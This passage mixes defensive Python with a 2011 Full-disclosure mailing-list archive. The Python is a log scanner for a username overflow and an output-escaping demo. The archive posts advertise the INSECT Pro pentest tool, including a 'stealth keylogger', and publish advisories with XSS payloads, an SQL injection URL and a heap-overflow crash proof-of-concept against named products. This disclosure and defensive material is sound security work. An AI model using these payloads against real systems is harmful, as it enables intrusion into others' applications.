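    '"GET /CHAT.GHP?room=1&username=bob%00%90 HTTP/1.1" 200 512',
]


def username_bytes(target):
    """Return the decoded username value of a /chat.ghp request, or None."""
    path, _, query = target.partition("?")
    if path.lower() != "/chat.ghp":
        return None
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name == "username":
            # Decode to bytes: the overflow is measured in bytes, not characters.
            return unquote_to_bytes(value)
    return None


def classify(line):
    """Classify one log line: 'ignore', 'ok', 'suspicious' or 'seh-overwrite'."""
    match = REQUEST_RE.search(line)
    if not match:
        return "ignore"
    value = username_bytes(match.group("target"))
    if value is None:
        return "ignore"
    if len(value) >= SEH_RECORD_END:
        # Long enough to cover the exception handler record described in the post.
        return "seh-overwrite"
    if len(value) > MAX_USERNAME or any(b < 0x20 or b > 0x7E for b in value):
        # Over the assumed policy limit, or carrying non-printable bytes.
        return "suspicious"
    return "ok"


def scan(lines):
    """Return (line number, verdict) for every line that needs attention."""
    findings = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict in ("suspicious", "seh-overwrite"):
            findings.append((number, verdict))
    return findings


if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```

The same length limit enforced at a reverse proxy in front of the server rejects the request before it reaches the vulnerable parser.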

[Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available

2011-08-02 Thread Juan Sacco
INSECT Pro 2.6.1 is worldwide available right now

Check the new cool features: http://www.youtube.com/watch?v=EcgPMyjHVbQ

* Run Faster: Because to make a good security testing is not enough
* Load Better: Major graphical interface and optimisation features were 
implemented
* Module Search: This version includes a new built-in search feature
* Improvements and Changes: Many more optimisations and updates were 
added
* Lots of bugs were patched

Start here: http://www.insecurityresearch.com

Regards
Juan Sacco

--
_
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned



[Full-disclosure] INSECT Pro - Advisory 2011 0628 - SQL Injection - XSS - RGBoard 2.2

2011-06-28 Thread Juan Sacco
 Information
 
 Name : SQL Injection and XSS discovered
 Software : RG Board 2.2
 Vendor Homepage : http://www.rgboard.com/
 Vulnerability Type : SQL injection and XSS reflected
 Severity : High
 Researcher : Juan Sacco jsacco [at] insecurityresearch [dot] com

 Description
 --
 RG Board 2.2 is prone to SQL Injection and XSS reflected
 vulnerabilities because the application fails to properly perform
 adequate boundary checks on user-supplied data.
 An attacker can exploit this issue to compromise the victim's machine.

 Details
 ---
 SQL injection is a code injection technique that exploits a security 
 vulnerability occurring in the database layer of an application (like 
 queries).

 Cross-site scripting (XSS) is a type of computer security vulnerability 
 typically found in web applications that enables attackers to inject 
 client-side script into web pages viewed by other users.

 Exploit example as follow
 -

 SQL Injection:
 http://target.com/main/view.php?bbs_code=[injectme]&bd_num=106&kw=&ss[sc]=1&ss[st]=1
 This vulnerability affects /main/view.php using method GET

 XSS:
 http://target.com/main/list.php?bbs_code=news&page=1%3cScRiPt%20%3ealert%28/XSS/%29%3c%2fScRiPt%3e

 The vulnerability is caused by the following code:
 <form id="category_form" action="?" method="get" enctype="multipart/form-data">
 <p id="ba_content_list_top"><input type="hidden" name="bbs_code" value="news" />
 <span class="floating_left">Category: <select name="ss[cat]" onchange="this.form.submit();">
 <option value="">All</option>
 <option value="7">News</option>
 <option value="8">PR</option>
 <option value="9">Video</option>
 </select></span> <span class="floating_right">Total : 47 (1<ScRiPt >alert(/XSS/)</ScRiPt>/3)</span></p>
 </form>


 Solution
 ---
 No patch is available at this time.

 Credits
 ---
 Manually discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.6.1 was released stay tunned



[Full-disclosure] [New Security Tool] INSECT Pro 2.6.1 release

2011-06-22 Thread Juan Sacco
 Test your network security and audit your website using the same tools 
 as hackers.
 INSECT Pro 2.6.1 is available for purchase right now worldwide through 
 PayPal!

 * Run Faster: You not only want to make great security testing, you 
 want a nice performance
 * Load Better: Major graphical interface and optimizations features
 * Module Search: Ever wondered where that module? We have a built-in 
 search feature for you
 * Improvements, and Changes As always, we've added a lot of other 
 features and optimizations
 * The latest exploits found in the wild

 We are always trying to be one step ahead of the competition, take a 
 visual tour of some of INSECT Pro most popular features and discover 
 INSECT Pro today!

 Start here: http://www.insecurityresearch.com

 Regards
 Juan Sacco
 --
 
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 INSECT Pro 2.6.1 on track - Stay tunned



[Full-disclosure] INSECT Pro - Advisory 2011 0620 - Zero Day - XSS Persistent in EA Sports

2011-06-20 Thread Juan Sacco
 Information
 
 Name : XSS Persistent in EA Sports
 Software : EA Sports Main site
 Vendor Homepage : http://www.ea.com
 Vulnerability Type : XSS Persistent
 Severity : Very High
 Researcher : Juan Sacco jsacco [at] insecurityresearch [dot] com

 Description
 --
 EA Sports is prone to a XSS Stored vulnerability because the 
 application fails to properly perform adequate boundary checks on 
 user-supplied data.
 An attacker can exploit this issue to execute arbitrary code in the 
 victim's machine.

 Details
 ---
 The persistent (or stored) XSS vulnerability is a more devastating 
 variant of a cross-site scripting flaw: it occurs when the data provided 
 by the attacker is saved by the server, and then permanently displayed 
 on normal pages returned to other users in the course of regular 
 browsing, without proper HTML escaping. A classic example of this is 
 with online message boards where users are allowed to post HTML 
 formatted messages for other users to read

 Exploit example as follow
 -
 Vulnerable web site
 http://www.ea.com/soccer/profile/biography/cem_ea_id/jsacco123

 The vulnerability is caused by the following code and affected by the 
 Hometown input
 <li>
  <label class="section">Home Town:</label>
  '&gt;<script xml:space="preserve">alert("XSS discovered by INSECT Pro")</script>  </li>
 <li>

 Solution
 ---
 No patch is available at this time.

 Credits
 ---
 Manually discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.6.1 was released stay tunned
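
The "proper HTML escaping" that this advisory and the earlier Bing advisory refer to depends on where the value lands in the page. The following is an added example, not code from the posts or from the affected sites: it renders a stored profile field into HTML text and a reflected parameter into a script block, unencoded and encoded. The templates, function names and shortened inputs are assumptions modelled on the advisories, and that `where1` lands in a single-quoted JavaScript string is an assumption drawn from the payload's leading `';`.

```python
import html
import json
from html.parser import HTMLParser

# Constructed inputs modelled on the payloads quoted in the advisories.
HOMETOWN_INPUT = "'><script>alert(/XSS/)</script>"
WHERE1_INPUT = "';alert(String.fromCharCode(88,83,83))//</SCRIPT>"

# Characters that stay meaningful to the HTML parser inside a <script> block,
# or that could close a single-quoted string.
JS_EXTRA_ESCAPES = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026", "'": "\\u0027"}


def js_string_literal(value):
    """Encode value as a JavaScript string literal that is safe inside <script>."""
    literal = json.dumps(value)  # escapes ", \ and control characters
    for char, escaped in JS_EXTRA_ESCAPES.items():
        literal = literal.replace(char, escaped)
    return literal


def profile_unescaped(hometown):
    """Stored value written into HTML text as-is (the flaw described)."""
    return '<li><label class="section">Home Town:</label> ' + hometown + "</li>"


def profile_escaped(hometown):
    """Same template with HTML escaping applied at output time."""
    return ('<li><label class="section">Home Town:</label> '
            + html.escape(hometown, quote=True) + "</li>")


def map_script_unescaped(where1):
    """Value reflected into a single-quoted JavaScript string (assumed context)."""
    return "<script>var where1 = '" + where1 + "';</script>"


def map_script_html_escaped(where1):
    """HTML escaping used in the JavaScript context: the wrong encoder."""
    return "<script>var where1 = '" + html.escape(where1, quote=True) + "';</script>"


def map_script_encoded(where1):
    """JavaScript string encoding for the JavaScript context."""
    return "<script>var where1 = " + js_string_literal(where1) + ";</script>"


class TagAudit(HTMLParser):
    """Collect the start tags and text an HTML parser sees in a fragment."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_data(self, data):
        self.text.append(data)


def audit(markup):
    """Return (start tags, concatenated text) for an HTML fragment."""
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, "".join(parser.text)


if __name__ == "__main__":
    print(audit(profile_unescaped(HOMETOWN_INPUT)))  # a script element appears
    print(audit(profile_escaped(HOMETOWN_INPUT)))    # input survives as text only
    print(map_script_unescaped(WHERE1_INPUT))        # string is closed early
    print(map_script_html_escaped("\\"))             # backslash eats the closing quote
    print(map_script_encoded(WHERE1_INPUT))          # stays one string literal
```

HTML escaping leaves a backslash untouched, which is why the script-block case needs its own encoder instead of reusing the one for HTML text.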



[Full-disclosure] [Security Tool] INSECT Pro 2.6.1 is here

2011-05-30 Thread Juan Sacco
 INSECT Pro 2.6.1 is here! This penetration security auditing and 
 testing software solution is designed to allow organizations of all 
 sizes mitigate, monitor and manage the latest security threats 
 vulnerabilities and implement active security policies by performing 
 penetration tests across their infrastructure and applications.

 * Run Faster: You not only want to make great security testing, you 
 want screaming performance
 * Load Better: Major graphical interface and optimizations features
 that we implemented
 * Module Search: Ever wondered where that module? We have a built-in 
 search feature for your project
 * Improvements, and Changes As always, we've added a slew of other 
 features and optimizations

 When is 2.6.1 available? INSECT Pro 2.6.1 is available for purchase 
 right now via PayPal!

 We are always trying to be one step ahead of the competition, take a 
 visual tour of some of INSECT Pro most popular features and discover why 
 INSECT Pro has become a leader in security software and solutions around 
 the globe. Start your tour here: http://www.insecurityresearch.com

 Regards
 Juan Sacco
 --
 
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 INSECT Pro 2.6.1 on track - Stay tunned



[Full-disclosure] Insect Pro - Advisory 2011 0427 Persistent Cross-Site Scripting (XSS) in xMatters AlarmPoint

2011-04-28 Thread Juan Sacco
 Information
 
 Name : XSS Persistent vulnerability in xMatters AlarmPoint Java Web 
 Server API
 Software : xMatters AlarmPoint
 Vendor Homepage : http://www.xmatters.com
 Vulnerability Type : Cross-Site Scripting
 Severity : High
 Researcher : Juan Sacco jsacco [at] insecurityresearch [dot] com

 Description
 --
 The AlarmPoint Java Server consists of a collection of software  
 components and software APIs designed to provide a flexible and
 powerful set of tools for integrating various applications to 
 AlarmPoint.

 Details
 ---
 AlarmPoint Java Web Server API is affected by a Persistent XSS 
 vulnerability in version 3.2.1

 Exploit as follow:
 Insert new HTTP API with the following malicious code:
 <?xml version="1.0"?>
 <transaction version="1.0">
 <header>
 <method>Alive</method>
 </header>
 <data>
 <agent_client_id>ping</agent_client_id>
 </data>
 </transaction>'<script>alert(/XSS/)</script>

 Go to: http://example.com:2010/agent/status.html
 Response:
 AgentStatus
 3.2.1 (Build 
 
23894/20071210175331)ea-cad0f2c429ee/192.168.72.128Unavailable192.168.72.128:2004115'scriptalert(/XSS/)/script

 Cross-Site Scripting attacks are a type of injection problem, in which 
 malicious scripts are injected into the otherwise benign and trusted web 
 sites.
 https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

 Solution
 ---
 No patch is available at this time.

 Credits
 ---
 Manually discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 --
  _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released stay tunned



[Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

2011-04-28 Thread Juan Sacco
 Information
 
 Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
 Version: APClient 3.2.0 (native)
 Software : xMatters AlarmPoint
 Vendor Homepage : http://www.xmatters.com
 Vulnerability Type : Heap Buffer Overflow
 Md5: 283d98063323f35deb7afbd1db93d859  APClient.bin
 Severity : High
 Researcher : Juan Sacco jsacco [at] insecurityresearch [dot] com

 Description
 --
 The AlarmPoint Java Server consists of a collection of software
 components and software APIs designed to provide a flexible and
 powerful set of tools for integrating various applications to
 AlarmPoint.

 Details
 ---
 AlarmPoint APClient is affected by a Heap Overflow vulnerability in 
 version APClient 3.2.0 (native)

 A heap overflow condition is a buffer overflow, where the buffer that 
 can be overwritten is allocated in the heap portion of memory, generally 
 meaning that the buffer was allocated using a routine such as the POSIX 
 malloc() call.
 https://www.owasp.org/index.php/Heap_overflow


 Exploit as follow:
 Submit a malicious file containing the exploit
 root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$  
 ./APClient.bin --submit-file maliciousfile.hex
 or
 (gdb) run `python -c 'print "\x90"*16287'`
 Starting program: /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c 'print "\x90"*16287'`

 Program received signal SIGSEGV, Segmentation fault.
 0x0804be8a in free ()
 (gdb) i r
 eax            0xa303924        170932516
 ecx            0xbfb8           49080
 edx            0xa303924        170932516
 ebx            0x8059438        134583352
 esp            0xbfff3620       0xbfff3620
 ebp            0xbfff3638       0xbfff3638
 esi            0x8059440        134583360
 edi            0x80653f0        134632432
 eip            0x804be8a        0x804be8a <free+126>
 eflags         0x210206         [ PF IF RF ID ]
 cs             0x73             115
 ss             0x7b             123
 ds             0x7b             123
 es             0x7b             123
 fs             0x0              0
 gs             0x33             51
 (gdb)


 Solution
 ---
 No patch is available at this time.

 Credits
 ---
 Manually discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 --
  _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released stay tunned



[Full-disclosure] Insect Pro 2.1 : New version release

2011-03-08 Thread Juan Sacco
 The Insect Pro 2.1 new version is now accessible on Insecurity Research 
 servers!
 Get it now to enjoy the positive changes that this update brings, based 
 directly on user feedback

 Insect Pro is a penetration security auditing and testing software 
 solution designed to allow organizations of all sizes mitigate, monitor 
 and manage the latest security threats vulnerabilities and implement 
 active security policies by performing penetration tests across their 
 infrastructure and applications.

 Insect Pro 2.1 includes:
 Minimize to systray to work in background
 Video recording
 Capture screenshots
 Keylogging feature
 Command-line based control
 GUI improved

 Read full patch notes on our site to learn more about what's new and 
 improved.

 Also, anyone that has not yet donated to get a license may do it now and
 obtain a free version of the new stealth keylogger!

 Juan Sacco
-- 
 _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.1 was released stay tunned



Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell

2011-01-27 Thread Juan Sacco
Hey Steve, Thanks for your time. Probably this tool is not meant for you,
since you use metasploit, I wasn't trying to reinvent the wheel, This tool is
oriented to people with basic security skills, that need a way to do pentest
to their sites among many other possibilities.

Thanks again, don't forget to donate because you didn't But I'm ok with
that :-)

Juan Sacco

On Wed, Jan 26, 2011 at 3:33 PM, Steve Pinkham steve.pink...@gmail.com wrote:

 On 01/26/2011 01:25 PM, Juan Sacco wrote:
  Steve, is a lot easier get donation and rent a good hosting. Sorry I'm
  going to pass your offer.
 
  Juan Sacco
 

 Sure, I understand.  Unfortunately, that puts you back in the liar
 category about whether or not the software is actually free.

 Too bad, I just wasted 20 bucks and a few hours setting up quality
 hosting, and I was looking forward to trying out a new tool.

 Back to metasploit for me!
 --
  | Steven Pinkham, Security Consultant|
  | http://www.mavensecurity.com   |
  | GPG public key ID CD31CAFB |




-- 
_
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.0 was released stay tunned

Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell

2011-01-26 Thread Juan Sacco
Hi, Troll
Thanks for your review :-)
It's a pity that the tools you refer cost from $5000 to $3 usd
INSECT Pro is a tool for penetration testing that we'd created based on the
free classes we gave here in Argentina, listening to all the obstacles
people had using tools that we love like metasploit.
BTW: We love meterpreter, that's why we use it of course. What's your
problem using it? Don't you know how to use it?
INSECT PRO 2.0 is free, we only ask for a minimum donation to maintain the
ftp and the web-site online.

Juan Sacco
-- 
_
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.0 was released stay tunned



On Tue, Jan 25, 2011 at 7:45 PM, R0me0 *** knight@gmail.com wrote:

 I think that this tool is a BIG bullshit, and only serves to noobs and
 lammers, and too exists others tools that deserve respect
 SAINT, CORE IMPACT and other and of course !  THE METASPLOIT FRAMEWORK ( U
 use the meterpreter in your tool)

 Regards,

 spawn



 2011/1/25 Roger rno...@gmail.com

 Too late. I already sent that information to the FBI for prime
 factorisation.

 -r


Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell

2011-01-26 Thread Juan Sacco
Steve, yes you can! :-)

Let me know by email when you are ready! and I hope you could make a
personal review of Insect Pro 2.0 when you get a copy :P

BTW I will change that word licence is confusing I guess,

Thanks for supporting our software

Juan Sacco

-- 
_
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.0 was released stay tunned


On Wed, Jan 26, 2011 at 1:27 AM, Steve Pinkham steve.pink...@gmail.com wrote:

 On 01/25/2011 10:06 PM, runlvl wrote:
  From our download section:
 http://www.insecurityresearch.com/?page_id=926
 
  make a donation of minimum: $20 ( US Dollars )
 
  This helps us to maintain Insect Pro and the whole site!
 
  Steve,
 
  I'm sorry, we can't afford the project ( ftp bandwidth and http server ),
  luckily a lot of people are trusting on us, so we can continue with this
  tool. Thumbs up! :-)
 
  Juan Sacco

 I repeat: If I'm just paying for download access, can I pay $20,
 download it, then host it for others to download for free.  If not, it's
 paying for licensing, not download bandwidth.  Also, I repeat, YOUR OWN
 SITE says you are paying for a license, not download access.

 Quote from the page we both linked to:
  After you make the donation please write us an email to
  don...@insecurityresearch.com with your full name and we will send
  you the user and password for your new license.

 Put up or shut up time: I will pay to host the download on my own server
 for the next 6 months if the product license allows it (and it is legal for
 me to do so as not infringing copyright, etc), or you need to stop
 claiming it is free.

 So, can I redistribute it for free, or are you a liar?

